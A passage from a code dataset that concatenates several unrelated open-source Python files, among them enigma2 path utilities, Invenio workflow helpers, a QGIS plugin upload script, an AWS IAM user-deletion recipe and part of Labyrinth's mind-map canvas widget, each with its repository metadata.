SCOPE_CONFIG: [("/home/root/", FILE_MOVE),
(eEnv.resolve("${datadir}/enigma2/defaults/"), FILE_COPY)],
SCOPE_HDD: [("/hdd/movies", PATH_MOVE)]
}
def resolveFilename(scope, base = "", path_prefix = None):
if base.startswith("~/"):
# you can only use the ~/ if we have a prefix directory
assert path_prefix is not None
base = os.path.join(path_prefix, base[2:])
# don't resolve absolute paths
if base.startswith('/'):
return base
if scope == SCOPE_CURRENT_SKIN:
from Components.config import config
# allow files in the config directory to replace skin files
tmp = defaultPaths[SCOPE_CONFIG][0]
if base and pathExists(tmp + base):
path = tmp
else:
tmp = defaultPaths[SCOPE_SKIN][0]
pos = config.skin.primary_skin.value.rfind('/')
if pos != -1:
#if basefile is not available use default skin path as fallback
tmpfile = tmp+config.skin.primary_skin.value[:pos+1] + base
if pathExists(tmpfile):
path = tmp+config.skin.primary_skin.value[:pos+1]
else:
path = tmp
else:
path = tmp
elif scope == SCOPE_CURRENT_PLUGIN:
tmp = defaultPaths[SCOPE_PLUGINS]
from Components.config import config
skintmp = defaultPaths[SCOPE_SKIN]
pos = config.skin.primary_skin.value.rfind('/')
if pos != -1:
#if basefile is not available inside current skin path, use the original provided file as fallback
skintmpfile = skintmp[0]+config.skin.primary_skin.value[:pos+1] + base
if fileExists(skintmpfile):
path = skintmp[0]+config.skin.primary_skin.value[:pos+1]
else:
path = tmp[0]
else:
path = tmp[0]
else:
tmp = defaultPaths[scope]
path = tmp[0]
flags = tmp[1]
if flags == PATH_CREATE:
if not pathExists(path):
try:
mkdir(path)
except OSError:
print "resolveFilename: Couldn't create %s" % path
return None
fallbackPath = fallbackPaths.get(scope)
if fallbackPath and not fileExists(path + base):
for x in fallbackPath:
try:
if x[1] == FILE_COPY:
if fileExists(x[0] + base):
try:
os.link(x[0] + base, path + base)
except:
system("cp " + x[0] + base + " " + path + base)
break
elif x[1] == FILE_MOVE:
if fileExists(x[0] + base):
os.rename(x[0] + base, path + base)
break
elif x[1] == PATH_COPY:
if pathExists(x[0]):
if not pathExists(defaultPaths[scope][0]):
mkdir(path)
system("cp -a " + x[0] + "* " + path)
break
elif x[1] == PATH_MOVE:
if pathExists(x[0]):
os.rename(x[0], path + base)
break
except Exception, e:
print "[D] Failed to recover %s:" % (path+base), e
# FIXME: we also have to handle DATADIR etc. here.
return path + base
# this is only the BASE - an extension must be added later.
pathExists = os.path.exists
isMount = os.path.ismount
def defaultRecordingLocation(candidate=None):
if candidate and os.path.exists(candidate):
return candidate
# First, try whatever /hdd points to, or /media/hdd
try:
path = os.readlink('/hdd')
except:
path = '/media/hdd'
if not os.path.exists(path):
path = ''
# Find the largest local disk
from Components import Harddisk
mounts = [m for m in Harddisk.getProcMounts() if m[1].startswith('/media/')]
biggest = 0
havelocal = False
for candidate in mounts:
try:
islocal = candidate[1].startswith('/dev/') # Good enough
stat = os.statvfs(candidate[1])
# Free space counts double
size = (stat.f_blocks + stat.f_bavail) * stat.f_bsize
if (islocal and not havelocal) or ((islocal or not havelocal) and (size > biggest)):
path = candidate[1]
havelocal = islocal
biggest = size
except Exception, e:
print "[DRL]", e
if path:
# If there's a movie subdir, we'd probably want to use that.
movie = os.path.join(path, 'movie')
if os.path.isdir(movie):
path = movie
if not path.endswith('/'):
path += '/' # Bad habits die hard, old code relies on this
return path
def createDir(path, makeParents = False):
try:
if makeParents:
makedirs(path)
else:
mkdir(path)
except:
return 0
else:
return 1
def removeDir(path):
try:
rmdir(path)
except:
return 0
else:
return 1
def fileExists(f, mode='r'):
if mode == 'r':
acc_mode = R_OK
elif mode == 'w':
acc_mode = W_OK
else:
acc_mode = F_OK
return access(f, acc_mode)
def getRecordingFilename(basename, dirname = None):
# filter out non-allowed characters
non_allowed_characters = "/.\\:*?<>|\""
filename = ""
basename = basename.replace('\xc2\x86', '').replace('\xc2\x87', '')
for c in basename:
if c in non_allowed_characters or ord(c) < 32:
c = "_"
filename += c
# max filename length for ext4 is 255 (minus 8 characters for .ts.meta)
filename = filename[:247]
if dirname is not None:
if not dirname.startswith('/'):
dirname = os.path.join(defaultRecordingLocation(), dirname)
else:
dirname = defaultRecordingLocation()
filename = os.path.join(dirname, filename)
i = 0
while True:
path = filename
if i > 0:
path += "_%03d" % i
try:
open(path + ".ts")
i += 1
except IOError:
return path
# this is clearly a hack:
def InitFallbackFiles():
resolveFilename(SCOPE_CONFIG, "userbouquet.favourites.tv")
resolveFilename(SCOPE_CONFIG, "bouquets.tv")
resolveFilename(SCOPE_CONFIG, "userbouquet.favourites.radio")
resolveFilename(SCOPE_CONFIG, "bouquets.radio")
# returns a list of tuples containing pathname and filename matching the given pattern
# example-pattern: match all txt-files: ".*\.txt$"
def crawlDirectory(directory, pattern):
list = []
if directory:
expression = compile(pattern)
for root, dirs, files in walk(directory):
for file in files:
if expression.match(file) is not None:
list.append((root, file))
return list
def copyfile(src, dst):
try:
f1 = open(src, "rb")
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
f2 = open(dst, "w+b")
while True:
buf = f1.read(16*1024)
if not buf:
break
f2.write(buf)
st = os_stat(src)
mode = S_IMODE(st.st_mode)
if have_chmod:
chmod(dst, mode)
if have_utime:
utime(dst, (st.st_atime, st.st_mtime))
except:
print "copy", src, "to", dst, "failed!"
return -1
return 0
def copytree(src, dst, symlinks=False):
names = listdir(src)
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
if not os.path.isdir(dst):
mkdir(dst)
else:
makedirs(dst)
for name in names:
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = readlink(srcname)
symlink(linkto, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks)
else:
copyfile(srcname, dstname)
except:
print "dont copy srcname (no file or link or folder)"
try:
st = os_stat(src)
mode = S_IMODE(st.st_mode)
if have_chmod:
chmod(dst, mode)
if have_utime:
utime(dst, (st.st_atime, st.st_mtime))
except:
print "copy stats for", src, "failed!"
# Renames files or if source and destination are on different devices moves them in background
# input list of (source, destination)
def moveFiles(fileList):
movedList = []
try:
try:
for item in fileList:
os_rename(item[0], item[1])
movedList.append(item)
except OSError, e:
if e.errno == 18:
print "[Directories] cannot rename across devices, trying slow move"
import Screens.CopyFiles
Screens.CopyFiles.moveFiles(fileList, item[0])
print "[Directories] Moving in background..."
else:
raise
except Exception, e:
print "[Directories] Failed move:", e
for item in movedList:
try:
os_rename(item[1], item[0])
except:
print "[Directories] Failed to undo move:", item
raise
def getSize(path, pattern=".*"):
path_size = 0
if os.path.isdir(path):
files = crawlDirectory(path, pattern)
for file in files:
filepath = os.path.join(file[0], file[1])
path_size += os.path.getsize(filepath)
elif os.path.isfile(path):
path_size = os.path.getsize(path)
return path_size
|
MOA-2011/enigma2
|
lib/python/Tools/Directories.py
|
Python
|
gpl-2.0
| 10,585
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2012, 2013, 2014, 2015, 2016 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Various utility functions for use across the workflows module."""
from __future__ import absolute_import, print_function
from flask import current_app, jsonify, render_template, session
import msgpack
from math import ceil
from six import text_type, string_types
from werkzeug import import_string
from invenio_workflows import WorkflowObject, workflows
from .proxies import current_workflows_ui
class Pagination(object):
"""Helps with rendering pagination list."""
def __init__(self, page, per_page, total_count):
self.page = page
self.per_page = per_page
self.total_count = total_count
@property
def pages(self):
"""Returns number of pages."""
return int(ceil(self.total_count / float(self.per_page)))
@property
def has_prev(self):
"""Returns true if it has previous page."""
return self.page > 1
@property
def has_next(self):
"""Returns true if it has next page."""
return self.page < self.pages
def iter_pages(self, left_edge=1, left_current=1,
right_current=3, right_edge=1):
last = 0
for num in xrange(1, self.pages + 1):
if num <= left_edge or \
(num > self.page - left_current - 1 and
num < self.page + right_current) or \
num > self.pages - right_edge:
if last + 1 != num:
yield None
yield num
last = num
def get_formatted_workflow_object(bwo, date_format='%Y-%m-%d %H:%M:%S.%f'):
"""Return the formatted output, from cache if available."""
results = current_workflows_ui.get("row::{0}".format(bwo.id))
if results:
results = msgpack.loads(results)
if results["date"] == bwo.modified.strftime(date_format):
return results
results = generate_formatted_workflow_object(bwo)
if results:
current_workflows_ui.set(
"row::{0}".format(bwo.id),
msgpack.dumps(results)
)
return results
def generate_formatted_workflow_object(
bwo, date_format='%Y-%m-%d %H:%M:%S.%f'):
"""Generate a dict with formatted column data from workflows UI object."""
from invenio_workflows import workflows
from .definitions import WorkflowBase
workflows_name = bwo.get_workflow_name()
if workflows_name and workflows_name in workflows and \
hasattr(workflows[workflows_name], 'get_description'):
workflow_definition = workflows[workflows_name]
else:
workflow_definition = WorkflowBase
action_name = bwo.get_action() or ""
action = current_workflows_ui.actions.get(action_name, None)
mini_action = getattr(action, "render_mini", "")
if mini_action:
mini_action = action().render_mini(bwo)
results = {
"name": workflows_name,
"description": workflow_definition.get_description(bwo),
"title": workflow_definition.get_title(bwo),
"date": bwo.modified.strftime(date_format),
"additional": workflow_definition.get_additional(bwo),
"action": mini_action,
"sort_data": workflow_definition.get_sort_data(bwo)
}
return results
def get_data_types():
"""Return a list of distinct data types from WorkflowObject."""
return list(
current_app.config.get('WORKFLOWS_UI_DATA_TYPES', dict()).keys()
)
def get_workflow_names():
"""Return a list of distinct data types from WorkflowObject."""
return [workflow.name for workflow in workflows.values()
if hasattr(workflow, 'name')]
def get_rendered_row(obj_id):
"""Return a single formatted row."""
bwo = WorkflowObject.query.get(obj_id) # noqa
if not bwo:
current_app.logger.error("workflow object not found for {0}".format(obj_id))
return ""
preformatted = get_formatted_workflow_object(bwo)
return render_template(
current_app.config["WORKFLOWS_UI_LIST_ROW_TEMPLATE"],
title=preformatted.get("title", ""),
object=bwo,
action=preformatted.get("action", ""),
description=preformatted.get("description", ""),
additional=preformatted.get("additional", "")
)
def get_rows(results):
"""Return all rows formatted."""
id_list = [hit.id for hit in results.hits]
session['workflows_ui_current_ids'] = id_list
return [get_rendered_row(bid)
for bid in id_list]
def get_previous_next_objects(object_list, current_object_id):
"""Return tuple of (previous, next) object for given workflows UI object."""
if not object_list:
return None, None
try:
current_index = object_list.index(current_object_id)
except ValueError:
# current_object_id not in object_list:
return None, None
try:
next_object_id = object_list[current_index + 1]
except IndexError:
next_object_id = None
try:
if current_index == 0:
previous_object_id = None
else:
previous_object_id = object_list[current_index - 1]
except IndexError:
previous_object_id = None
return previous_object_id, next_object_id
def get_func_info(func):
"""Retrieve a function's information."""
name = func.func_name
doc = func.func_doc or ""
try:
nicename = func.description
except AttributeError:
if doc:
nicename = doc.split('\n')[0]
if len(nicename) > 80:
nicename = name
else:
nicename = name
parameters = []
closure = func.func_closure
varnames = func.func_code.co_freevars
if closure:
for index, arg in enumerate(closure):
if not callable(arg.cell_contents):
parameters.append((varnames[index],
text_type(arg.cell_contents)))
return ({
"nicename": nicename,
"doc": doc,
"parameters": parameters,
"name": name
})
def get_workflow_info(func_list):
"""Return function info, go through lists recursively."""
funcs = []
for item in func_list:
if item is None:
continue
if isinstance(item, list):
funcs.append(get_workflow_info(item))
else:
funcs.append(get_func_info(item))
return funcs
def obj_or_import_string(value, default=None):
"""Import string or return object."""
if isinstance(value, string_types):
return import_string(value)
elif value:
return value
return default
|
jalavik/invenio-workflows-ui
|
invenio_workflows_ui/utils.py
|
Python
|
gpl-2.0
| 7,380
|
from gnue.forms.input.GFKeyMapper import KeyMapper
from src.gnue.forms.uidrivers.java.widgets._base import UIWidget
from src.gnue.forms.uidrivers.java.widgets._remote import List
_all__ = ["UIList"]
# =============================================================================
# Interface implementation for a grid widget
# =============================================================================
class UIList(UIWidget):
def _create_widget_ (self, event):
self.widget = List(self, self._gfObject.label or "", self._gfObject.style)
self.getParent().addWidget(self)
def is_growable(self):
return True
def _ui_set_values_(self, values):
self.widget.uiSetValues(values)
def _ui_set_value_(self, index, value):
self.widget.uiSetValue(index, value)
def _ui_select_row_(self, index):
self.widget.uiSelectRow(index)
def addWidget(self, ui_widget):
"""
Add a given UI widget to the Notebook.
@param ui_widget: widget to add to the page
"""
self.widget.uiAdd(ui_widget.widget)
def onSelectionChanged(self, index):
self._gfObject._event_item_focused(index)
def onSetFocus(self):
self._gfObject._event_set_focus()
# navigable
def _ui_set_focus_(self):
self.widget.uiSetFocus()
def onKeyPressed(self, keycode, shiftDown, ctrlDown, altDown):
command, args = KeyMapper.getEvent(keycode, shiftDown, ctrlDown, altDown)
if command:
self._request(command, triggerName=args)
# =============================================================================
# Configuration data
# =============================================================================
configuration = {
'baseClass': UIList,
'provides' : 'GFList',
'container': True
}
|
HarmonyEnterpriseSolutions/harmony-platform
|
src/gnue/forms/uidrivers/java/widgets/list_.py
|
Python
|
gpl-2.0
| 1,699
|
#!/usr/bin/env python
# This script uploads a plugin package on the server
#
# Author: A. Pasotti, V. Picavet
import getpass
from optparse import OptionParser
import sys
import xmlrpclib
# Configuration
PROTOCOL = 'http'
SERVER = 'plugins.qgis.org'
PORT = '80'
ENDPOINT = '/plugins/RPC2/'
VERBOSE = False
def main(options, args):
address = "%s://%s:%s@%s:%s%s" % (PROTOCOL, options.username, options.password,
options.server, options.port, ENDPOINT)
print
"Connecting to: %s" % hidepassword(address)
server = xmlrpclib.ServerProxy(address, verbose=VERBOSE)
try:
plugin_id, version_id = server.plugin.upload(xmlrpclib.Binary(open(args[0]).read()))
print
"Plugin ID: %s" % plugin_id
print
"Version ID: %s" % version_id
except xmlrpclib.ProtocolError, err:
print
"A protocol error occurred"
print
"URL: %s" % hidepassword(err.url, 0)
print
"HTTP/HTTPS headers: %s" % err.headers
print
"Error code: %d" % err.errcode
print
"Error message: %s" % err.errmsg
except xmlrpclib.Fault, err:
print
"A fault occurred"
print
"Fault code: %d" % err.faultCode
print
"Fault string: %s" % err.faultString
def hidepassword(url, start=6):
"""Returns the http url with password part replaced with '*'."""
passdeb = url.find(':', start) + 1
passend = url.find('@')
return "%s%s%s" % (url[:passdeb], '*' * (passend - passdeb), url[passend:])
if __name__ == "__main__":
parser = OptionParser(usage="%prog [options] plugin.zip")
parser.add_option("-w", "--password", dest="password",
help="Password for plugin site", metavar="******")
parser.add_option("-u", "--username", dest="username",
help="Username of plugin site", metavar="user")
parser.add_option("-p", "--port", dest="port",
help="Server port to connect to", metavar="80")
parser.add_option("-s", "--server", dest="server",
help="Specify server name", metavar="plugins.qgis.org")
(options, args) = parser.parse_args()
if len(args) != 1:
print
"Please specify zip file.\n"
parser.print_help()
sys.exit(1)
if not options.server:
options.server = SERVER
if not options.port:
options.port = PORT
if not options.username:
# interactive mode
username = getpass.getuser()
print
"Please enter user name [%s] :" % username,
res = raw_input()
if res != "":
options.username = res
else:
options.username = username
if not options.password:
# interactive mode
options.password = getpass.getpass()
main(options, args)
|
blazek/lrs
|
lrs/plugin_upload.py
|
Python
|
gpl-2.0
| 2,882
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from opinel.utils.aws import connect_service
from opinel.utils.cli_parser import OpinelArgumentParser
from opinel.utils.console import configPrintException, printError
from opinel.utils.credentials import read_creds
from opinel.utils.globals import check_requirements
from opinel.services.iam import delete_user
########################################
##### Main
########################################
def main():
# Parse arguments
parser = OpinelArgumentParser()
parser.add_argument('debug')
parser.add_argument('profile')
parser.add_argument('user-name', help = 'Name of the user(s) to be deleted.')
args = parser.parse_args()
# Configure the debug level
configPrintException(args.debug)
# Check version of opinel
if not check_requirements(os.path.realpath(__file__)):
return 42
# Require at least one user names
if not len(args.user_name):
printError("Error, you need to provide at least one user name.")
return 42
# Read creds
credentials = read_creds(args.profile[0])
if not credentials['AccessKeyId']:
return 42
# Connect to IAM APIs
iam_client = connect_service('iam', credentials)
if not iam_client:
return 42
# Delete users
for user in args.user_name:
delete_user(iam_client, user)
if __name__ == '__main__':
sys.exit(main())
|
iSECPartners/AWS-recipes
|
Python/awsrecipes_delete_iam_user.py
|
Python
|
gpl-2.0
| 1,451
|
#!/usr/bin/env python3
# Repeater Callsign for CWID
REPEATER_CALLSIGN="ON4SEB"
# CWID delay in minutes
BEACON_DELAY=10
# Repeater Startup message
REPEATER_STARTUP_MSG="QRV"
|
reec/pyRepeater
|
src/repeater_config.py
|
Python
|
gpl-2.0
| 177
|
# Copyright (C) 2008 Dejan Muhamedagic <dmuhamedagic@suse.de>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import sys
import re
from singletonmixin import Singleton
def topics_dict(help_tab):
if not help_tab:
return {}
topics = {}
for topic in help_tab:
if topic != '.':
topics[topic] = None
return topics
def mk_completion_tab(obj,ctab):
from completion import get_completer_list
cmd_table = obj.cmd_table
for key,value in cmd_table.items():
if key.startswith("_"):
continue
if type(value) == type(object):
ctab[key] = {}
elif key == "help":
ctab[key] = topics_dict(obj.help_table)
else:
ctab[key] = get_completer_list(obj,key)
class Levels(Singleton):
'''
Keep track of levels and prompts.
'''
def __init__(self,start_level):
self._marker = 0
self._in_transit = False
self.level_stack = []
self.comp_stack = []
self.current_level = start_level()
self.parse_root = self.current_level.cmd_table
self.prompts = []
self.completion_tab = {}
mk_completion_tab(self.current_level,self.completion_tab)
def getprompt(self):
return ' '.join(self.prompts)
def mark(self):
self._marker = len(self.level_stack)
self._in_transit = False
def release(self):
while len(self.level_stack) > self._marker:
self.droplevel()
def new_level(self,level_obj,token):
self.level_stack.append(self.current_level)
self.comp_stack.append(self.completion_tab)
self.prompts.append(token)
self.current_level = level_obj()
self.parse_root = self.current_level.cmd_table
try:
if not self.completion_tab[token]:
mk_completion_tab(self.current_level,self.completion_tab[token])
self.completion_tab = self.completion_tab[token]
except:
pass
self._in_transit = True
def previous(self):
if self.level_stack:
return self.level_stack[-1]
def droplevel(self):
if self.level_stack:
self.current_level.end_game(self._in_transit)
self.current_level = self.level_stack.pop()
self.completion_tab = self.comp_stack.pop()
self.parse_root = self.current_level.cmd_table
self.prompts.pop()
# vim:ts=4:sw=4:et:
|
ClusterLabs/pacemaker-1.0
|
shell/modules/levels.py
|
Python
|
gpl-2.0
| 3,125
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/directoryselectorbase.ui'
#
# Created: Mon Jul 29 20:12:07 2013
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_DirectorySelector(object):
def setupUi(self, DirectorySelector):
DirectorySelector.setObjectName(_fromUtf8("DirectorySelector"))
DirectorySelector.resize(329, 27)
self.horizontalLayout = QtGui.QHBoxLayout(DirectorySelector)
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setMargin(0)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.lineEdit = QtGui.QLineEdit(DirectorySelector)
self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
self.horizontalLayout.addWidget(self.lineEdit)
self.btnSelect = QtGui.QToolButton(DirectorySelector)
self.btnSelect.setObjectName(_fromUtf8("btnSelect"))
self.horizontalLayout.addWidget(self.btnSelect)
self.retranslateUi(DirectorySelector)
QtCore.QMetaObject.connectSlotsByName(DirectorySelector)
def retranslateUi(self, DirectorySelector):
DirectorySelector.setWindowTitle(QtGui.QApplication.translate("DirectorySelector", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.btnSelect.setText(QtGui.QApplication.translate("DirectorySelector", "...", None, QtGui.QApplication.UnicodeUTF8))
|
NaturalGIS/geotag_and_import_photos
|
ui/ui_directoryselectorbase.py
|
Python
|
gpl-2.0
| 1,577
|
#! /usr/bin/env python
# MMapArea.py
# This file is part of Labyrinth
#
# Copyright (C) 2006 - Don Scorgie <Don@Scorgie.org>
#
# Labyrinth is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Labyrinth is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Labyrinth; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA
#
import math
import time
import string
from gi.repository import Gtk
from gi.repository import Pango
from gi.repository import GObject
import gettext
import copy
import cairo
import logging
_ = gettext.gettext
import xml.dom.minidom as dom
import Links
import TextThought
import LabelThought
import ImageThought
import DrawingThought
import ResourceThought
import UndoManager
import utils
from BaseThought import BaseThought
from Links import Link
RAD_UP = (- math.pi / 2.)
RAD_DOWN = (math.pi / 2.)
RAD_LEFT = (math.pi)
RAD_RIGHT = (0)
MODE_NULL = 0
MODE_TEXT = 1
MODE_IMAGE = 2
MODE_DRAW = 3
MODE_RESOURCE = 4
MODE_LABEL = 5
VIEW_LINES = 0
VIEW_BEZIER = 1
# TODO: Need to expand to support popup menus
MENU_EMPTY_SPACE = 0
# UNDO actions
UNDO_MOVE = 0
UNDO_CREATE = 1
UNDO_DELETE = 2
UNDO_DELETE_SINGLE = 3
UNDO_COMBINE_DELETE_NEW = 4
UNDO_DELETE_LINK = 5
UNDO_STRENGTHEN_LINK = 6
UNDO_CREATE_LINK = 7
UNDO_ALIGN = 8
# Note: This is (atm) very broken. It will allow you to create new canvases, but not
# create new thoughts or load existing maps.
# To get it working either fix the TODO list at the bottom of the class, implement the
# necessary features within all the thought types. If you do, please send a patch ;)
# OR: Change this class to MMapAreaNew and MMapAreaOld to MMapArea
class MMapArea (Gtk.DrawingArea):
'''A MindMapArea Widget. A blank canvas with a collection of child thoughts.\
It is responsible for processing signals and such from the whole area and \
passing these on to the correct child. It also informs things when to draw'''
__gsignals__ = dict (
title_changed = (GObject.SignalFlags.RUN_FIRST,
None, (GObject.TYPE_STRING, )),
change_mode = (GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_INT, )),
change_buffer = (GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_OBJECT, )),
text_selection_changed = (GObject.SignalFlags.RUN_FIRST,
None,
(GObject.TYPE_INT, GObject.TYPE_INT,
GObject.TYPE_STRING)),
thought_selection_changed = (GObject.SignalFlags.RUN_FIRST,
None,
(GObject.TYPE_PYOBJECT,
GObject.TYPE_PYOBJECT)),
set_focus = (GObject.SignalFlags.RUN_FIRST, None,
(GObject.TYPE_PYOBJECT, GObject.TYPE_BOOLEAN)),
set_attrs = (GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_BOOLEAN, GObject.TYPE_BOOLEAN,
GObject.TYPE_BOOLEAN, Pango.FontDescription)),
link_selected = (GObject.SignalFlags.RUN_FIRST,
None,
()))
def __init__(self, undo):
super (MMapArea, self).__init__()
self.thoughts = []
self.links = []
self.selected = []
self.num_selected = 0
self.primary = None
self.pango_context = self.create_pango_context()
self.undo = undo
self.scale_fac = 1.0
self.translate = False
self.translation = [0.0,0.0]
self.timeout = -1
self.current_cursor = None
self.do_filter = True
self.is_bbox_selecting = False
self.nthoughts = 0
impl = dom.getDOMImplementation()
self.save = impl.createDocument("http://www.donscorgie.blueyonder.co.uk/labns", "MMap", None)
self.element = self.save.documentElement
self.im_context = Gtk.IMMulticontext ()
self.mode = MODE_NULL
self.old_mode = MODE_NULL
self.connect ("expose_event", self.expose)
self.connect ("button_release_event", self.button_release)
self.connect ("button_press_event", self.button_down)
self.connect ("motion_notify_event", self.motion)
self.connect ("key_press_event", self.key_press)
self.connect ("key_release_event", self.key_release)
self.connect ("scroll_event", self.scroll)
self.commit_handler = None
self.title_change_handler = None
self.drag_mode = False
self._dragging = False
self.sw = None
self.hadj = 0
self.vadj = 0
self.origin_x = None
self.origin_y = None
self.moving = False
self.move_mode = False
self.move_origin = None
self.move_origin_new = None
self.focus = None
self.move_action = None
self.current_root = []
self.rotation = 0
self.text_attributes = {}
self.set_events (Gdk.EventMask.KEY_PRESS_MASK |
Gdk.EventMask.KEY_RELEASE_MASK |
Gdk.EventMask.BUTTON_PRESS_MASK |
Gdk.EventMask.BUTTON_RELEASE_MASK |
Gdk.EventMask.POINTER_MOTION_MASK |
Gdk.EventMask.SCROLL_MASK
)
self.set_flags (Gtk.CAN_FOCUS)
# set theme colors
w = Gtk.Window()
w.realize()
style = w.get_style()
self.pango_context.set_font_description(style.font_desc)
# FIXME: rude hack to remove fontsize from font name
parts = style.font_desc.to_string().split()
try:
float(parts[-1])
self.font_name = string.join(parts[0:-2])
except ValueError:
self.font_name = style.font_desc.to_string()
utils.default_font = self.font_name
self.font_size = utils.default_font_size
utils.default_colors["text"] = utils.gtk_to_cairo_color(style.text[Gtk.StateType.NORMAL])
utils.default_colors["base"] = utils.gtk_to_cairo_color(style.base[Gtk.StateType.NORMAL])
# Match the fixed white canvas colour (makes thought focus visible)
self.background_color = style.white
self.foreground_color = style.black
utils.default_colors["bg"] = utils.gtk_to_cairo_color(style.bg[Gtk.StateType.NORMAL])
utils.default_colors["fg"] = utils.gtk_to_cairo_color(style.fg[Gtk.StateType.NORMAL])
utils.selected_colors["text"] = utils.gtk_to_cairo_color(style.text[Gtk.StateType.SELECTED])
utils.selected_colors["bg"] = utils.gtk_to_cairo_color(style.bg[Gtk.StateType.SELECTED])
utils.selected_colors["fg"] = utils.gtk_to_cairo_color(style.fg[Gtk.StateType.SELECTED])
utils.selected_colors["fill"] = utils.gtk_to_cairo_color(style.base[Gtk.StateType.SELECTED])
def set_text_attributes(self, text_attributes):
return
'''
self.font_combo_box = text_attributes.props.page.fonts_combo_box.combo
self.font_sizes_combo_box = utils.default_font_size #text_attributes.props.page.font_sizes_combo_box.combo
'''
def transform_coords(self, loc_x, loc_y):
if hasattr(self, "transform"):
return self.transform.transform_point(loc_x, loc_y)
def untransform_coords(self, loc_x, loc_y):
if hasattr(self, "untransform"):
return self.untransform.transform_point(loc_x, loc_y)
def button_down (self, widget, event):
if self.drag_mode:
self.set_cursor(Gdk.HAND2)
self.origin_x = event.x
self.origin_y = event.y
self._dragging = True
return
if event.button == 2 or \
event.button == 1 and self.translate == True:
self.set_cursor (Gdk.FLEUR)
self.original_translation = self.translation
self.origin_x = event.x
self.origin_y = event.y
return
coords = self.transform_coords (event.get_coords()[0], event.get_coords()[1])
obj = self.find_object_at (coords)
if obj:
if event.button == 3 or self.move_mode:
if self.move_mode:
self.moving = True
else:
self.moving = not (event.get_state() & Gdk.ModifierType.CONTROL_MASK)
if self.moving:
self.set_cursor(Gdk.FLEUR)
self.move_origin = (coords[0], coords[1])
self.move_origin_new = self.move_origin
if obj == self.focus:
self.focus.enter()
else:
self.set_focus(obj, event.get_state())
obj.process_button_down(event, coords)
elif self.mode and event.button == 1 and widget:
self.embody_thought(event)
elif event.button == 1 and self.mode == MODE_NULL:
self.bbox_origin = coords
self.is_bbox_selecting = True
def undo_move (self, action, mode):
self.undo.block ()
move_thoughts = action.args[1]
old_coords = action.args[0]
new_coords = action.args[2]
move_x = old_coords[0] - new_coords[0]
move_y = old_coords[1] - new_coords[1]
if mode == UndoManager.REDO:
move_x = -move_x
move_y = -move_y
self.unselect_all ()
for t in move_thoughts:
self.select_thought (t, -1)
t.move_by (move_x, move_y)
self.undo.unblock ()
self.invalidate ((old_coords[0], old_coords[1], new_coords[0], new_coords[1]))
def button_release (self, widget, event):
if self._dragging:
self.set_cursor(Gdk.CursorType.LEFT_PTR)
self._dragging = False
coords = self.transform_coords (event.get_coords()[0], event.get_coords()[1])
if self.is_bbox_selecting:
self.is_bbox_selecting = False
self.invalidate ()
try:
if abs(self.bbox_origin[0] - coords[0]) > 2.0:
return True
except AttributeError: # no bbox_current
pass
if self.translate:
self.translate = False
return True
if self.moving and self.move_action:
self.move_action.add_arg (coords)
self.undo.add_undo (self.move_action)
self.move_action = None
was_moving = False
if self.moving:
was_moving = True
self.stop_moving()
obj = self.find_object_at (coords)
if event.button == 2:
self.undo.add_undo (UndoManager.UndoAction (self, UndoManager.TRANSFORM_CANVAS, \
self.undo_transform_cb,
self.scale_fac, self.scale_fac,
self.original_translation,
self.translation))
if obj:
if not obj.process_button_release(event, coords):
# prolonged creation was failed
self.undo.forget_action()
else:
self.update_view(obj)
if len(self.selected) != 1:
self.invalidate() # does not invalidate correctly with obj.get_max_area()
return True
self.invalidate ()
if was_moving:
self.start_moving(self.move_button)
return True
def undo_transform_cb (self, action, mode):
if mode == UndoManager.UNDO:
self.scale_fac = action.args[0]
self.translation = action.args[2]
else:
self.scale_fac = action.args[1]
self.translation = action.args[3]
self.invalidate ()
def scroll (self, widget, event):
scale = self.scale_fac
if event.direction == Gdk.ScrollDirection.UP:
self.scale_fac*=1.2
elif event.direction == Gdk.ScrollDirection.DOWN:
self.scale_fac/=1.2
self.undo.add_undo (UndoManager.UndoAction (self, UndoManager.TRANSFORM_CANVAS, \
